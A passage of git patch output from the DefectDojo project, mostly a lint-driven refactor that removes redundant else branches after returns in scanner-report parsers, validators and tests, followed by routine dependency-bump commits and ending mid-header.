a/dojo/tools/vcg/parser.py +++ b/dojo/tools/vcg/parser.py @@ -65,8 +65,7 @@ def get_field_from_xml(issue, field): and issue.find(field).text is not None ): return issue.find(field).text - else: - return None + return None def __init__(self): pass @@ -97,8 +96,7 @@ def parse_issue(self, issue, test): data.code_line = self.get_field_from_xml(issue, "CodeLine") # data.line = self.get_field_from_xml(issue, 'CodeLine') - finding = data.to_finding(test) - return finding + return data.to_finding(test) def parse(self, content, test): dupes = {} @@ -133,8 +131,7 @@ class VCGCsvParser: def get_field_from_row(row, column): if row[column] is not None: return row[column] - else: - return None + return None def parse_issue(self, row, test): if not row: @@ -168,8 +165,7 @@ def parse_issue(self, row, test): data.line = self.get_field_from_row(row, line_column) data.code_line = self.get_field_from_row(row, code_line_column) - finding = data.to_finding(test) - return finding + return data.to_finding(test) def parse(self, content, test): dupes = {} @@ -219,8 +215,7 @@ def get_findings(self, filename, test): # 'utf-8' This line was added to pass a unittest in test_parsers.TestParsers.test_file_existence. if filename.name.lower().endswith(".xml"): return list(VCGXmlParser().parse(content, test).values()) - elif filename.name.lower().endswith(".csv"): + if filename.name.lower().endswith(".csv"): return list(VCGCsvParser().parse(content, test).values()) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/veracode/json_parser.py b/dojo/tools/veracode/json_parser.py index fe707b964c1..fe48bbb46fd 100644 --- a/dojo/tools/veracode/json_parser.py +++ b/dojo/tools/veracode/json_parser.py @@ -133,9 +133,9 @@ def create_finding_from_details(self, finding_details, scan_type, policy_violate # Fill in extra info based on the scan type if scan_type == "STATIC": return self.add_static_details(finding, finding_details, backup_title=cwe_title) - elif scan_type == "DYNAMIC": + if scan_type == "DYNAMIC": return self.add_dynamic_details(finding, finding_details, backup_title=cwe_title) - elif scan_type == "SCA": + if scan_type == "SCA": return self.add_sca_details(finding, finding_details, backup_title=cwe_title) return None diff --git a/dojo/tools/veracode/parser.py b/dojo/tools/veracode/parser.py index ec3f5ba00d9..80f2e68c186 100644 --- a/dojo/tools/veracode/parser.py +++ b/dojo/tools/veracode/parser.py @@ -17,8 +17,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return VeracodeXMLParser().get_findings(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return VeracodeJSONParser().get_findings(filename, test) - else: - msg = "Filename extension not recognized. Use .xml or .json" - raise ValueError(msg) + msg = "Filename extension not recognized. Use .xml or .json" + raise ValueError(msg) diff --git a/dojo/tools/veracode/xml_parser.py b/dojo/tools/veracode/xml_parser.py index b53493fef5e..25908491739 100644 --- a/dojo/tools/veracode/xml_parser.py +++ b/dojo/tools/veracode/xml_parser.py @@ -272,8 +272,7 @@ def _get_cwe(val): cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE) if cweSearch: return int(cweSearch.group(1)) - else: - return None + return None @classmethod def __xml_sca_flaw_to_finding( diff --git a/dojo/tools/veracode_sca/parser.py b/dojo/tools/veracode_sca/parser.py index 8058bbae8fc..66c7e36ca89 100644 --- a/dojo/tools/veracode_sca/parser.py +++ b/dojo/tools/veracode_sca/parser.py @@ -237,11 +237,10 @@ def fix_severity(self, severity): def __cvss_to_severity(cls, cvss): if cvss >= 9: return cls.vc_severity_mapping.get(5) - elif cvss >= 7: + if cvss >= 7: return cls.vc_severity_mapping.get(4) - elif cvss >= 4: + if cvss >= 4: return cls.vc_severity_mapping.get(3) - elif cvss > 0: + if cvss > 0: return cls.vc_severity_mapping.get(2) - else: - return cls.vc_severity_mapping.get(1) + return cls.vc_severity_mapping.get(1) diff --git a/dojo/tools/wapiti/parser.py b/dojo/tools/wapiti/parser.py index deb6309d5af..3b6c6dfd4fd 100644 --- a/dojo/tools/wapiti/parser.py +++ b/dojo/tools/wapiti/parser.py @@ -108,5 +108,4 @@ def get_cwe(val): cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE) if cweSearch: return int(cweSearch.group(1)) - else: - return None + return None diff --git a/dojo/tools/wfuzz/parser.py b/dojo/tools/wfuzz/parser.py index 41d4ebeee69..2042fe5c17d 100644 --- a/dojo/tools/wfuzz/parser.py +++ b/dojo/tools/wfuzz/parser.py @@ -15,12 +15,13 @@ class WFuzzParser: def severity_mapper(self, input): if 200 <= int(input) <= 299: return "High" - elif 300 <= int(input) <= 399: + if 300 <= int(input) <= 399: return "Low" - elif 400 <= int(input) <= 499: + if 400 <= int(input) <= 499: return "Medium" - elif 500 <= int(input): + if 500 <= int(input): return "Low" + return None def get_scan_types(self): return ["WFuzz JSON report"] diff --git a/dojo/tools/whitehat_sentinel/parser.py b/dojo/tools/whitehat_sentinel/parser.py index eeb97ee8f5e..0c5ca4ff024 100644 --- a/dojo/tools/whitehat_sentinel/parser.py +++ b/dojo/tools/whitehat_sentinel/parser.py @@ -42,7 +42,7 @@ def get_findings(self, file, test): # Convert a WhiteHat Vuln with Attack Vectors to a list of DefectDojo # findings - dojo_findings = self._convert_whitehat_sentinel_vulns_to_dojo_finding( + return self._convert_whitehat_sentinel_vulns_to_dojo_finding( findings_collection["collection"], test, ) @@ -51,7 +51,6 @@ def get_findings(self, file, test): # # # Append DefectDojo findings to list # dojo_findings.append(dojo_finding) - return dojo_findings def _convert_whitehat_severity_id_to_dojo_severity( self, whitehat_severity_id: int, @@ -87,6 +86,7 @@ def _parse_cwe_from_tags(self, whitehat_sentinel_tags) -> str: for tag in whitehat_sentinel_tags: if tag.startswith("CWE-"): return tag.split("-")[1] + return None def _parse_description(self, whitehat_sentinel_description: dict): """ diff --git a/dojo/tools/wiz/parser.py b/dojo/tools/wiz/parser.py index f3125544748..ff98d94e499 100644 --- a/dojo/tools/wiz/parser.py +++ b/dojo/tools/wiz/parser.py @@ -204,6 +204,5 @@ def get_findings(self, filename, test): return WizParserByTitle().parse_findings(test, reader) if all(field in reader.fieldnames for field in ["Name", "DetailedName"]): return WizParserByDetailedName().parse_findings(test, reader) - else: - msg = "This CSV format of Wiz is not supported" - raise ValueError(msg) + msg = "This CSV format of Wiz is not supported" + raise ValueError(msg) diff --git a/dojo/tools/xanitizer/parser.py b/dojo/tools/xanitizer/parser.py index 7ec42343a62..b6a7cabdd55 100644 --- a/dojo/tools/xanitizer/parser.py +++ b/dojo/tools/xanitizer/parser.py @@ -24,8 +24,7 @@ def get_findings(self, filename, test): root = self.parse_xml(filename) if root is not None: return self.get_findings_internal(root, test) - else: - return [] + return [] def parse_xml(self, filename): try: @@ -161,7 +160,7 @@ def generate_file_path(self, finding): "relativePath", ): return finding.find("endNode").get("relativePath") - elif finding.find("node") is not None and finding.find("node").get( + if finding.find("node") is not None and finding.find("node").get( "relativePath", ): return finding.find("node").get("relativePath") diff --git a/dojo/tools/yarn_audit/parser.py b/dojo/tools/yarn_audit/parser.py index b13c2ffd684..8bc0c8adfd7 100644 --- a/dojo/tools/yarn_audit/parser.py +++ b/dojo/tools/yarn_audit/parser.py @@ -25,13 +25,12 @@ def get_findings(self, json_output, test): lines = lines.split("\n") tree = (json.loads(line) for line in lines if "{" in line) return self.get_items_yarn(tree, test) - elif '"value"' in lines: + if '"value"' in lines: lines = lines.split("\n") tree = (json.loads(line) for line in lines if "{" in line) return self.get_items_yarn2(tree, test) - else: - tree = json.loads(lines) - return self.get_items_auditci(tree, test) + tree = json.loads(lines) + return self.get_items_auditci(tree, test) def get_items_yarn(self, tree, test): items = {} diff --git a/dojo/user/utils.py b/dojo/user/utils.py index 9d4f0949d8e..2ba2cbc1d0f 100644 --- a/dojo/user/utils.py +++ b/dojo/user/utils.py @@ -13,42 +13,37 @@ def __init__(self, *args, **kwargs): def display_name(self): if self.name == "bannerconf": return "Login Banner" - elif self.name == "cred user": + if self.name == "cred user": return "Credentials" - elif self.name == "github conf": + if self.name == "github conf": return "GitHub Configurations" - elif self.name == "engagement survey": + if self.name == "engagement survey": return "Questionnaires" - elif self.name == "permission": + if self.name == "permission": return "Configuration Permissions" - elif self.name == "sla configuration": + if self.name == "sla configuration": return "SLA Configurations" - else: - return self.name.title() + "s" + return self.name.title() + "s" def view_codename(self): if self.view: return f'view_{self.name.replace(" ", "_")}' - else: - return None + return None def add_codename(self): if self.add: return f'add_{self.name.replace(" ", "_")}' - else: - return None + return None def change_codename(self): if self.change: return f'change_{self.name.replace(" ", "_")}' - else: - return None + return None def delete_codename(self): if self.delete: return f'delete_{self.name.replace(" ", "_")}' - else: - return None + return None def codenames(self): codenames = [] @@ -95,7 +90,7 @@ def get_configuration_permissions_fields(): questionnaire_permissions = [] rules_permissions = [] - permission_fields = [ + return [ Permission_Helper(name="cred user", app="dojo", view=True, add=True, change=True, delete=True), Permission_Helper(name="development environment", app="dojo", add=True, change=True, delete=True), Permission_Helper(name="finding template", app="dojo", view=True, add=True, change=True, delete=True), @@ -118,8 +113,6 @@ def get_configuration_permissions_fields(): Permission_Helper(name="user", app="auth", view=True, add=True, change=True, delete=True), ] - return permission_fields - def get_configuration_permissions_codenames(): codenames = [] diff --git a/dojo/user/validators.py b/dojo/user/validators.py index c393dc41c9d..83ee954419e 100644 --- a/dojo/user/validators.py +++ b/dojo/user/validators.py @@ -13,8 +13,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_too_short") - else: - return None + return def get_help_text(self): return gettext("Password must be at least %s characters long.") % get_system_setting("minimum_password_length") @@ -26,8 +25,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_too_short") - else: - return None + return def get_help_text(self): return gettext("Password must be less than %s characters long.") % get_system_setting("maximum_password_length") @@ -39,8 +37,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_number") - else: - return None + return def get_help_text(self): return gettext("Password must contain at least 1 digit, 0-9.") @@ -52,8 +49,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_upper") - else: - return None + return def get_help_text(self): return gettext("Password must contain at least 1 uppercase letter, A-Z.") @@ -65,8 +61,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_lower") - else: - return None + return def get_help_text(self): return gettext("Password must contain at least 1 lowercase letter, a-z.") @@ -79,8 +74,7 @@ def validate(self, password, user=None): raise ValidationError( self.get_help_text(), code="password_no_symbol") - else: - return None + return def get_help_text(self): return gettext("The password must contain at least 1 special character, " @@ -91,5 +85,4 @@ class DojoCommonPasswordValidator(CommonPasswordValidator): def validate(self, password, user=None): if get_system_setting("non_common_password_required"): return super().validate(password, user) - else: - return None + return None diff --git a/dojo/user/views.py b/dojo/user/views.py index 1034b4c3638..f43b6b7b600 100644 --- a/dojo/user/views.py +++ b/dojo/user/views.py @@ -158,13 +158,12 @@ def logout_view(request): if not settings.SHOW_LOGIN_FORM: return login_view(request) - else: - messages.add_message(request, - messages.SUCCESS, - _("You have logged out successfully."), - extra_tags="alert-success") + messages.add_message(request, + messages.SUCCESS, + _("You have logged out successfully."), + extra_tags="alert-success") - return HttpResponseRedirect(reverse("login")) + return HttpResponseRedirect(reverse("login")) @user_passes_test(lambda u: u.is_active) diff --git a/dojo/utils.py b/dojo/utils.py index 9446888b3e3..683bec737fc 100644 --- a/dojo/utils.py +++ b/dojo/utils.py @@ -180,7 +180,7 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t .order_by("id") ) - elif deduplication_algorithm == "unique_id_from_tool": + if deduplication_algorithm == "unique_id_from_tool": return ( Finding.objects.filter( **custom_filter, @@ -190,7 +190,7 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t .order_by("id") ) - elif deduplication_algorithm == "unique_id_from_tool_or_hash_code": + if deduplication_algorithm == "unique_id_from_tool_or_hash_code": query = Finding.objects.filter( Q(**custom_filter), ( @@ -201,7 +201,7 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t deduplicationLogger.debug(query.query) return query - elif deduplication_algorithm == "legacy": + if deduplication_algorithm == "legacy": # This is the legacy reimport behavior. Although it's pretty flawed and # doesn't match the legacy algorithm for deduplication, this is left as is for simplicity. # Re-writing the legacy deduplication here would be complicated and counter-productive. @@ -216,9 +216,8 @@ def match_finding_to_existing_findings(finding, product=None, engagement=None, t ).order_by("id") ) - else: - logger.error("Internal error: unexpected deduplication_algorithm: '%s' ", deduplication_algorithm) - return None + logger.error("Internal error: unexpected deduplication_algorithm: '%s' ", deduplication_algorithm) + return None # true if both findings are on an engagement that have a different "deduplication on engagement" configuration @@ -321,6 +320,7 @@ def do_dedupe_finding(new_finding, *args, **kwargs): deduplicate_legacy(new_finding) else: deduplicationLogger.debug("dedupe: skipping dedupe because it's disabled in system settings get()") + return None def deduplicate_legacy(new_finding): @@ -713,8 +713,7 @@ def add_breadcrumb(parent=None, if clear: request.session["dojo_breadcrumbs"] = None return - else: - crumbs = request.session.get("dojo_breadcrumbs", None) + crumbs = request.session.get("dojo_breadcrumbs", None) if top_level or crumbs is None: crumbs = [ @@ -842,27 +841,26 @@ def get_punchcard_data(objs, start_date, weeks, view="Finding"): if created < start_of_week: raise ValueError("date found outside supported range: " + str(created)) + if created >= start_of_week and created < start_of_next_week: + # add day count to current week data + day_counts[day_offset[created.weekday()]] = day_count + highest_day_count = max(highest_day_count, day_count) else: - if created >= start_of_week and created < start_of_next_week: - # add day count to current week data - day_counts[day_offset[created.weekday()]] = day_count - highest_day_count = max(highest_day_count, day_count) - else: - # created >= start_of_next_week, so store current week, prepare for next - while created >= start_of_next_week: - week_data, label = get_week_data(start_of_week, tick, day_counts) - punchcard.extend(week_data) - ticks.append(label) - tick += 1 - - # new week, new values! - day_counts = [0, 0, 0, 0, 0, 0, 0] - start_of_week = start_of_next_week - start_of_next_week += relativedelta(weeks=1) - - # finally a day that falls into the week bracket - day_counts[day_offset[created.weekday()]] = day_count - highest_day_count = max(highest_day_count, day_count) + # created >= start_of_next_week, so store current week, prepare for next + while created >= start_of_next_week: + week_data, label = get_week_data(start_of_week, tick, day_counts) + punchcard.extend(week_data) + ticks.append(label) + tick += 1 + + # new week, new values! + day_counts = [0, 0, 0, 0, 0, 0, 0] + start_of_week = start_of_next_week + start_of_next_week += relativedelta(weeks=1) + + # finally a day that falls into the week bracket + day_counts[day_offset[created.weekday()]] = day_count + highest_day_count = max(highest_day_count, day_count) # add week in progress + empty weeks on the end if needed while tick < weeks + 1: @@ -1217,8 +1215,7 @@ def __next__(self): data = self.flo.read(self.chunk_size) if data: return data - else: - raise StopIteration + raise StopIteration def __iter__(self): return self @@ -1288,9 +1285,7 @@ def template_search_helper(fields=None, query_string=None): return findings entry_query = build_query(query_string, fields) - found_entries = findings.filter(entry_query) - - return found_entries + return findings.filter(entry_query) def get_page_items(request, items, page_size, prefix=""): @@ -1432,8 +1427,7 @@ def decrypt(key, iv, encrypted_text): encrypted_text_bytes = binascii.a2b_hex(encrypted_text) decryptor = cipher.decryptor() decrypted_text = decryptor.update(encrypted_text_bytes) + decryptor.finalize() - decrypted_text = _unpad_string(decrypted_text) - return decrypted_text + return _unpad_string(decrypted_text) def _pad_string(value): @@ -1729,9 +1723,8 @@ def get_full_url(relative_url): def get_site_url(): if settings.SITE_URL: return settings.SITE_URL - else: - logger.warning("SITE URL undefined in settings, full_url cannot be created") - return "settings.SITE_URL" + logger.warning("SITE URL undefined in settings, full_url cannot be created") + return "settings.SITE_URL" @receiver(post_save, sender=User) @@ -1797,11 +1790,10 @@ def redirect_to_return_url_or_else(request, or_else): if return_url: # logger.debug('redirecting to %s: ', return_url.strip()) return redirect(request, return_url.strip()) - elif or_else: + if or_else: return redirect(request, or_else) - else: - messages.add_message(request, messages.ERROR, "Unable to redirect anywhere.", extra_tags="alert-danger") - return redirect(request, request.get_full_path()) + messages.add_message(request, messages.ERROR, "Unable to redirect anywhere.", extra_tags="alert-danger") + return redirect(request, request.get_full_path()) def redirect(request, redirect_to): @@ -2248,6 +2240,7 @@ def get_product(obj): if isinstance(obj, Product): return obj + return None def prod_name(obj): diff --git a/ruff.toml b/ruff.toml index 5d3eecbe4d5..50f8a2baf0e 100644 --- a/ruff.toml +++ b/ruff.toml @@ -52,6 +52,7 @@ select = [ "LOG", "G001", "G002", "G1", "G2", "INP", + "RET", "SLOT", "PIE", "T20", diff --git a/tests/product_test.py b/tests/product_test.py index bc3a64c0d4c..f0bdf0172dd 100644 --- a/tests/product_test.py +++ b/tests/product_test.py @@ -25,8 +25,7 @@ def __exit__(self, *_): while time.time() < self.timeout: if self.page_has_loaded(): return True - else: - time.sleep(0.2) + time.sleep(0.2) msg = f"Timeout waiting for {self.timeout}s" raise Exception(msg) diff --git a/unittests/dojo_test_case.py b/unittests/dojo_test_case.py index 425e96f5047..f72918cf938 100644 --- a/unittests/dojo_test_case.py +++ b/unittests/dojo_test_case.py @@ -352,18 +352,15 @@ def empty_jira_project_for_product(self, product, expected_delta_jira_project_db def get_jira_issue_status(self, finding_id): finding = Finding.objects.get(id=finding_id) - updated = jira_helper.get_jira_status(finding) - return updated + return jira_helper.get_jira_status(finding) def get_jira_issue_updated(self, finding_id): finding = Finding.objects.get(id=finding_id) - updated = jira_helper.get_jira_updated(finding) - return updated + return jira_helper.get_jira_updated(finding) def get_jira_comments(self, finding_id): finding = Finding.objects.get(id=finding_id) - comments = jira_helper.get_jira_comments(finding) - return comments + return jira_helper.get_jira_comments(finding) def get_jira_issue_updated_map(self, test_id): findings = Test.objects.get(id=test_id).finding_set.all() @@ -710,12 +707,10 @@ def do_finding_remove_tags_api(self, http_method, finding_id, tags=None, expecte return response.data def put_finding_remove_tags_api(self, finding_id, tags, *args, **kwargs): - response = self.do_finding_remove_tags_api(self.client.put, finding_id, tags, *args, **kwargs) - return response + return self.do_finding_remove_tags_api(self.client.put, finding_id, tags, *args, **kwargs) def patch_finding_remove_tags_api(self, finding_id, tags, *args, **kwargs): - response = self.do_finding_remove_tags_api(self.client.patch, finding_id, tags, *args, **kwargs) - return response + return self.do_finding_remove_tags_api(self.client.patch, finding_id, tags, *args, **kwargs) def do_finding_notes_api(self, http_method, finding_id, note=None): data = None diff --git a/unittests/test_apply_finding_template.py b/unittests/test_apply_finding_template.py index 58c188449d8..69f641206fe 100644 --- a/unittests/test_apply_finding_template.py +++ b/unittests/test_apply_finding_template.py @@ -122,9 +122,7 @@ def make_request(self, user_is_staff, finding_id, template_id, data=None): else: request = FindingTemplateTestUtil.create_get_request(user, self.apply_template_url) - v = views.apply_template_to_finding(request, finding_id, template_id) - - return v + return views.apply_template_to_finding(request, finding_id, template_id) def test_apply_template_to_finding_with_data_does_not_display_error_success(self): result = self.make_request(user_is_staff=True, finding_id=1, template_id=1, @@ -236,9 +234,7 @@ def make_request(self, user_is_staff, finding_id, data=None): else: request = FindingTemplateTestUtil.create_get_request(user, self.choose_template_url) - v = views.find_template_to_apply(request, finding_id) - - return v + return views.find_template_to_apply(request, finding_id) def test_unauthorized_find_template_to_apply_fails(self): result = self.make_request(user_is_staff=False, finding_id=1) @@ -275,9 +271,7 @@ def make_request(self, user_is_staff, finding_id, template_id, data=None): else: request = FindingTemplateTestUtil.create_get_request(user, self.finding_template_options_url) - v = views.choose_finding_template_options(request, finding_id, template_id) - - return v + return views.choose_finding_template_options(request, finding_id, template_id) def test_unauthorized_choose_finding_template_options_fails(self): result = self.make_request(user_is_staff=False, finding_id=1, template_id=1) diff --git a/unittests/test_import_reimport.py b/unittests/test_import_reimport.py index 1015f206d7a..2d68989c180 100644 --- a/unittests/test_import_reimport.py +++ b/unittests/test_import_reimport.py @@ -1865,9 +1865,7 @@ def import_scan_with_params_ui(self, filename, scan_type="ZAP Scan", engagement= if service is not None: payload["service"] = service - result = self.import_scan_ui(engagement, payload) - - return result + return self.import_scan_ui(engagement, payload) def reimport_scan_with_params_ui(self, test_id, filename, scan_type="ZAP Scan", minimum_severity="Low", active=True, verified=False, push_to_jira=None, tags=None, close_old_findings=True, scan_date=None): # Mimic old functionality for active/verified to avoid breaking tests @@ -1898,8 +1896,7 @@ def reimport_scan_with_params_ui(self, test_id, filename, scan_type="ZAP Scan", if scan_date is not None: payload["scan_date"] = scan_date - result = self.reimport_scan_ui(test_id, payload) - return result + return self.reimport_scan_ui(test_id, payload) # Observations: # - When reopening a mitigated finding, almost no fields are updated such as title, description, severity, impact, references, .... diff --git a/unittests/test_rest_framework.py b/unittests/test_rest_framework.py index e4c4ef361e6..ee758ddaedb 100644 --- a/unittests/test_rest_framework.py +++ b/unittests/test_rest_framework.py @@ -265,21 +265,28 @@ def _check_helper(check): if obj is None: self._check_or_fail(is_nullable, f"{self._get_prefix()} is not nullable yet the value returned was null") - elif schema_type == TYPE_BOOLEAN: + return None + if schema_type == TYPE_BOOLEAN: _check_helper(isinstance(obj, bool)) - elif schema_type == TYPE_INTEGER: + return None + if schema_type == TYPE_INTEGER: _check_helper(isinstance(obj, int)) - elif schema_type == TYPE_NUMBER: + return None + if schema_type == TYPE_NUMBER: _check_helper(obj.isdecimal()) - elif schema_type == TYPE_ARRAY: + return None + if schema_type == TYPE_ARRAY: _check_helper(isinstance(obj, list)) - elif schema_type == TYPE_OBJECT: + return None + if schema_type == TYPE_OBJECT: _check_helper(isinstance(obj, OrderedDict) or isinstance(obj, dict)) - elif schema_type == TYPE_STRING: + return None + if schema_type == TYPE_STRING: _check_helper(isinstance(obj, str)) - else: - # Default case - _check_helper(check=False) + return None + # Default case + _check_helper(check=False) + return None # print('_check_type ok for: %s: %s' % (schema, obj)) diff --git a/unittests/tools/test_api_sonarqube_importer.py b/unittests/tools/test_api_sonarqube_importer.py index ed157ed2046..2c5564fbecf 100644 --- a/unittests/tools/test_api_sonarqube_importer.py +++ b/unittests/tools/test_api_sonarqube_importer.py @@ -10,56 +10,47 @@ def dummy_product(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/product.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_issues(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/issues.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_rule(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_rule_wo_html_desc(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/rule_wo_html_desc.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_no_hotspot(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/no_vuln.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_one_hotspot(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/one_vuln.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_many_hotspots(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/many_vulns.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_hotspot_rule(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_hotspot_rule_wo_risk_description(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/rule_wo_risk_description.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def empty_list(self, *args, **kwargs): diff --git a/unittests/tools/test_api_sonarqube_parser.py b/unittests/tools/test_api_sonarqube_parser.py index fe4334408cd..176219291a5 100644 --- a/unittests/tools/test_api_sonarqube_parser.py +++ b/unittests/tools/test_api_sonarqube_parser.py @@ -16,26 +16,22 @@ def dummy_product(self, *args, **kwargs): with open("unittests/scans/api_sonarqube/product.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_issues(self, *args, **kwargs): with open("unittests/scans/api_sonarqube/issues.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_rule(self, *args, **kwargs): with open("unittests/scans/api_sonarqube/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_hotspot_rule(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def empty_list(self, *args, **kwargs): From ecb41074f08bde607eb0e0948d8aa8c01fdb533d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 17 Sep 2024 10:57:21 -0500 Subject: [PATCH 34/62] Bump sqlalchemy from 2.0.34 to 2.0.35 (#10925) Bumps [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) from 2.0.34 to 2.0.35. - [Release notes](https://github.com/sqlalchemy/sqlalchemy/releases) - [Changelog](https://github.com/sqlalchemy/sqlalchemy/blob/main/CHANGES.rst) - [Commits](https://github.com/sqlalchemy/sqlalchemy/commits) --- updated-dependencies: - dependency-name: sqlalchemy dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 9cc328a9f01..70cadd1972b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -37,7 +37,7 @@ python-dateutil==2.9.0.post0 pytz==2024.2 redis==5.0.8 requests==2.32.3 -sqlalchemy==2.0.34 # Required by Celery broker transport +sqlalchemy==2.0.35 # Required by Celery broker transport urllib3==1.26.18 uWSGI==2.0.26 vobject==0.9.7 From cfe7cf0e6ae127b32600203e6a3a9dc09cb87069 Mon Sep 17 00:00:00 2001 From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com> Date: Tue, 17 Sep 2024 12:30:22 -0500 Subject: [PATCH 35/62] Update mccutchen/go-httpbin Docker tag from v2.14.1 to v2.15.0 (docker-compose.override.unit_tests_cicd.yml) (#10923) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> --- docker-compose.override.dev.yml | 2 +- docker-compose.override.unit_tests.yml | 2 +- docker-compose.override.unit_tests_cicd.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/docker-compose.override.dev.yml b/docker-compose.override.dev.yml index c2beee1ec21..581dd627900 100644 --- a/docker-compose.override.dev.yml +++ b/docker-compose.override.dev.yml @@ -54,4 +54,4 @@ services: protocol: tcp mode: host "webhook.endpoint": - image: mccutchen/go-httpbin:v2.14.1@sha256:2612f203b1be154524b0dbb65212a158776f0643e2f6e1dad45984fc93413d97 + image: mccutchen/go-httpbin:v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a diff --git a/docker-compose.override.unit_tests.yml b/docker-compose.override.unit_tests.yml index 7cf73e8f1f7..7c32e179386 100644 --- a/docker-compose.override.unit_tests.yml +++ b/docker-compose.override.unit_tests.yml @@ -52,7 +52,7 @@ services: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] "webhook.endpoint": - image: mccutchen/go-httpbin:v2.14.1@sha256:2612f203b1be154524b0dbb65212a158776f0643e2f6e1dad45984fc93413d97 + image: mccutchen/go-httpbin:v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} diff --git a/docker-compose.override.unit_tests_cicd.yml b/docker-compose.override.unit_tests_cicd.yml index c0448794d51..64af8ac79aa 100644 --- a/docker-compose.override.unit_tests_cicd.yml +++ b/docker-compose.override.unit_tests_cicd.yml @@ -51,7 +51,7 @@ services: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] "webhook.endpoint": - image: mccutchen/go-httpbin:v2.14.1@sha256:2612f203b1be154524b0dbb65212a158776f0643e2f6e1dad45984fc93413d97 + image: mccutchen/go-httpbin:v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} From 4edfdaa18d6d76d9ffd899dc5ee271d751a6636f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 18 Sep 2024 11:57:49 -0500 Subject: [PATCH 36/62] Bump boto3 from 1.35.20 to 1.35.21 (#10929) Bumps [boto3](https://github.com/boto/boto3) from 1.35.20 to 1.35.21. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.20...1.35.21) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 70cadd1972b..c4856bd1b24 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.20 # Required for Celery Broker AWS (SQS) support +boto3==1.35.21 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 42704c9cf33dbd7a283c3265455090be636e7222 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 19 Sep 